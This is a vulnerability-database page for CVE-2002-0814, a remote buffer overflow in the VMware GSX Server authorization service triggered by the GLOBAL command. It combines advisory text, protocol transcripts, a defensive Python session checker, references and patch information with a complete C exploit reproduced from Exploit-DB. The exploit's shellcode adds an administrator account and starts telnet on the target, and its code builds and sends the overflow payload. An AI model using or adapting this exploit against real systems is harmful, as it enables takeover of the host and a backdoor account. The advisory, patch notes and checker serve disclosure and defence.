CVE-2002-0814
CVSS 7.5
Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:22:02

[Original] Buffer overflow in VMware Authorization Service for VMware GSX Server 2.0.0 build-2050 allows remote authenticated users to execute arbitrary code via a long GLOBAL argument.


[CNNVD] VMware GSX Server Authentication Service Remote Buffer Overflow Vulnerability (CNNVD-200208-066)

        
VMware GSX Server is a very popular virtual PC product; it includes a remote-access authentication service.
The VMware GSX Server authentication service lacks a proper length check on the argument of the "Global" command, and a remote attacker can use this flaw to mount a buffer overflow attack.
VMware GSX Server communicates with VMware Remote Console over port 902, on which the VMware Authorization Service listens; before any data exchange begins, the following handshake must be completed:
220 VMware Authentication Daemon Version 1.00
USER anyuser
331 Password required for user.
PASS ******
230 User user logged in.
GLOBAL server
200 Connect Global
The USER, PASS and GLOBAL commands all check their arguments: when an over-long argument string is submitted, the connection is dropped and a message similar to "599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()" is returned:
220 VMware Authentication Daemon Version 1.00
USER AAAA....(Ax500)
599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()
However, the GLOBAL command already overflows when given an argument string that does not exceed the length limit. The overflow causes the VMware Authorization Service to terminate abnormally, and a carefully constructed argument may allow an attacker to execute arbitrary commands on the system with administrator privileges.
Exploiting this vulnerability requires a valid account.
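A session-transcript checker for the exchange described above, added here as an example; it is not part of the CNNVD record or of VMware's software. The per-command argument limits and the sample transcripts are constructed assumptions, chosen so that a transcript like the quoted handshake passes and the over-long or binary arguments described above are flagged.

```python
# Added example (not part of the CNNVD/NVD record or of VMware's code): a
# defender-side checker for vmware-authd (TCP 902) session transcripts.
# The per-command limits are assumed policy values, not figures from the advisory.
import re
import string

LIMITS = {b"USER": 128, b"PASS": 128, b"GLOBAL": 64}  # assumed caps
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
CMD_RE = re.compile(rb"^(USER|PASS|GLOBAL)\s*(.*)$", re.IGNORECASE)


def analyse_session(lines):
    """Return (line_no, finding, detail) tuples for one client/server transcript.

    Flags the daemon's own 599 PANIC (its read-length guard tripped), a GLOBAL
    sent before a 230 login, and any argument over the cap or carrying
    non-printable bytes; the advisory notes a GLOBAL shorter than the read
    limit still overflows, so the binary-content check is the useful signal.
    """
    findings = []
    logged_in = False
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip(b"\r\n")
        if line.startswith(b"230 "):
            logged_in = True
            continue
        if line.startswith(b"599 "):
            findings.append((no, "authd-panic", line.decode("latin-1")))
            continue
        m = CMD_RE.match(line)
        if not m:
            continue
        cmd, arg = m.group(1).upper(), m.group(2)
        if cmd == b"GLOBAL" and not logged_in:
            findings.append((no, "global-before-login", ""))
        if len(arg) > LIMITS[cmd]:
            findings.append((no, "arg-too-long", "%s len=%d" % (cmd.decode(), len(arg))))
        if any(b not in PRINTABLE for b in arg):
            findings.append((no, "arg-binary", cmd.decode()))
    return findings


# Constructed transcripts; BENIGN mirrors the handshake quoted in the advisory.
BENIGN = [b"220 VMware Authentication Daemon Version 1.00", b"USER anyuser",
          b"331 Password required for user.", b"PASS secret",
          b"230 User user logged in.", b"GLOBAL server", b"200 Connect Global"]
PANIC = [BENIGN[0], b"USER " + b"A" * 500,
         b"599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()"]
SUSPECT = BENIGN[:5] + [b"GLOBAL " + b"A" * 200 + b"\x90\x90\xcc"]
```

Feed it the lines of a captured port-902 session in order; a clean handshake yields no findings, while the daemon's own 599 response, an over-long argument, or binary bytes in a GLOBAL argument each produce one.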
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0814
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0814
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-066
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0057.html
(UNKNOWN)  NTBUGTRAQ  20020805 VMware GSX Server 2.0.1 Release and Security Alert
http://marc.info/?l=bugtraq&m=102752511030425&w=2
(UNKNOWN)  BUGTRAQ  20020724 VMware GSX Server Remote Buffer Overflow
http://marc.info/?l=bugtraq&m=102765223418716&w=2
(UNKNOWN)  BUGTRAQ  20020726 Re: VMware GSX Server Remote Buffer Overflow
http://www.iss.net/security_center/static/9663.php
(UNKNOWN)  XF  vmware-gsx-auth-bo(9663)
http://www.securityfocus.com/bid/5294
(UNKNOWN)  BID  5294
http://www.vmware.com/download/gsx_security.html
(UNKNOWN)  CONFIRM  http://www.vmware.com/download/gsx_security.html

- Vulnerability information

VMware GSX Server Authentication Service Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
2002-08-12 00:00:00 2005-05-02 00:00:00
Remote
        

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* No suitable temporary workaround is available at present.
Vendor patch:
VMware
------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:
VMware GSX Server 2.0:
VMware Patch vmware-authd.zip
        
        http://www.vmware.com/download1/software/support/vmware-authd.zip

- Vulnerability information (21639)

VMWare GSX Server 2.0 Authentication Server Buffer Overflow Vulnerability (EDBID:21639)
windows remote
2002-07-24 Verified
0 Zag & Glcs
N/A
source: http://www.securityfocus.com/bid/5294/info

VMWare GSX Server ships with an authentication server. The server is vulnerable to a buffer overflow related to handling of the argument to the "GLOBAL" command. While attackers must be authenticated before the command can be issued, default accounts may exist. This has not been confirmed by VMWare.

This condition may be exploited to execute arbitrary code on the GSX server host. The code likely executes on the underlying, native system and may compromise the host entirely (including all virtual systems).

////////////////////////////////////////////////////////////////////
//  VMwareOverflowTest v1.0
//  Written by Zag & Glcs
//  BigBall@venustech.com.cn glcs@venustech.com.cn
//  http://www.Venustech.com
////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment (lib, "Ws2_32")

//... to make sure that the shellcode length and GLOBAL command length do not
//exceed the limit.

//add an administrator account: x_adrc password: x_adrc
//start the telnet service
unsigned char shellcode[] =
"\x68\xC1\x15\x35\x09\x81\x2C\x24"
"\x80\xD1\xF0\x08\x68\x63\x20\x20"
"\x2F\x68\x5F\x61\x64\x72\x68\x72"
"\x73\x20\x78\x68\x72\x61\x74\x6F"
"\x68\x6E\x69\x73\x74\x68\x61\x64"
"\x6D\x69\x68\x6F\x75\x70\x20\x68"
"\x61\x6C\x67\x72\x68\x20\x6C\x6F"
"\x63\x68\x26\x6E\x65\x74\x68\x74"
"\x73\x76\x72\x68\x20\x74\x6C\x6E"
"\x68\x74\x61\x72\x74\x68\x65\x74"
"\x20\x73\x68\x44\x44\x26\x6E\x68"
"\x63\x20\x2F\x41\x68\x5F\x61\x64"
"\x72\x68\x72\x63\x20\x78\x68\x78"
"\x5F\x61\x64\x68\x73\x65\x72\x20"
"\x68\x65\x74\x20\x75\x68\x2F\x63"
"\x20\x6E\x68\x63\x6D\x64\x20\x8B"
"\xC4\x6A\x01\x50\xB8\xC6\x84\xE6"
"\x77\xFF\xD0\x90";

//the JMP ESP address of Windows XP English Version; we can add the address
//of other systems, such as Windows 2000.
unsigned char Jmp_ESP_XP_Eng[] = {0x1b,0x17,0xe3,0x77};//WinXP Eng
unsigned char Jmp_ESP[4];

void usage ()
{
	printf ("VMwareOverflowTest v1.0\n Written by Zag & Glcs\n"
		" Email:BigBall@venustech.com.cn\n Glcs@venustech.com.cn\n"
		" www.Venustech.com\n\nUsage:VMwareOverflowTest.exe <IP> <PORT> <username>"
		" <passwd> <os type>\n\t0.Windows XP Eng\n");
	return;
}

int main (int argc, char **argv)
{
	char str[4096];
	WSADATA wsa;
	SOCKET sock;
	struct sockaddr_in server;
	int ret;
	int i = 0;
	if (argc != 6)
	{
		usage ();
		return 0;
	}
	WSAStartup (MAKEWORD (2, 2), &wsa);
	sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
	server.sin_family = AF_INET;
	server.sin_port = htons (atoi (argv[2]));
	server.sin_addr.s_addr = inet_addr (argv[1]);

	//the base address of the DLL files on each system is not the same, so
	//we need to modify the call address
	//we can find that the system has loaded the DLL files we need by
	//checking the VMware Authorization Service
	//then we only need to modify the call address
	//(BASE_ADDRESS + FUNCTION_OFFSET)
	switch (atoi(argv[5]))
	{
	case 0:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		//Jmp_ESP_XP_Eng is a 4-byte array with no terminating NUL, so copy exactly 4 bytes
		memcpy (Jmp_ESP, Jmp_ESP_XP_Eng, sizeof (Jmp_ESP));

		break;
	default:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;

		memcpy (Jmp_ESP, Jmp_ESP_XP_Eng, sizeof (Jmp_ESP));
		break;
	}
	ret = connect (sock, (struct sockaddr *)&server, sizeof (server));

	if (ret == SOCKET_ERROR)
	{
		printf ("connect error\n");
		return -1;
	}

	//receive welcome message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

	//send username confirm message
	memset (str, 0, sizeof (str));
	strcpy (str,"USER ");
	strcat (str, argv[3]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

	//receive confirm message
	memset (str, 0, sizeof (str));
	recv (sock, str, 100, 0);
	printf ("%s", str);

	//send password
	memset (str, 0, sizeof (str));
	strcpy (str,"PASS ");
	strcat (str, argv[4]);
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);

	//receive confirm message
	memset (str, 0, sizeof (str));
	ret = recv (sock, str, 100, 0);
	printf ("%s", str);

	//make GLOBAL command
	memset (str, 0, sizeof (str));
	strcpy (str, "GLOBAL ");
	//to raise the success probability, we use the half-continuous
	//covering, so the exact overflow point is not needed
	for(i = 7; i < 288; i += 8)
	{
		memcpy(str + i, "\x90\x90\x58\x68", 4);
		//write the JMP ESP command into the possible return
		//address
		memcpy(str + i + 4, Jmp_ESP, 4);
	}

	//append the shellcode to the GLOBAL command string
	memcpy (str + i, shellcode, strlen ((const char *) shellcode));
	strcat (str, "\r\n");
	ret = send (sock, str, strlen (str), 0);
	printf ("Done!\n");
	closesocket (sock);
	WSACleanup ();
	return 1;
}

- Vulnerability information

5078
VMware GSX Authorization Service GLOBAL Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-07-24 Unknown
2002-07-24 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
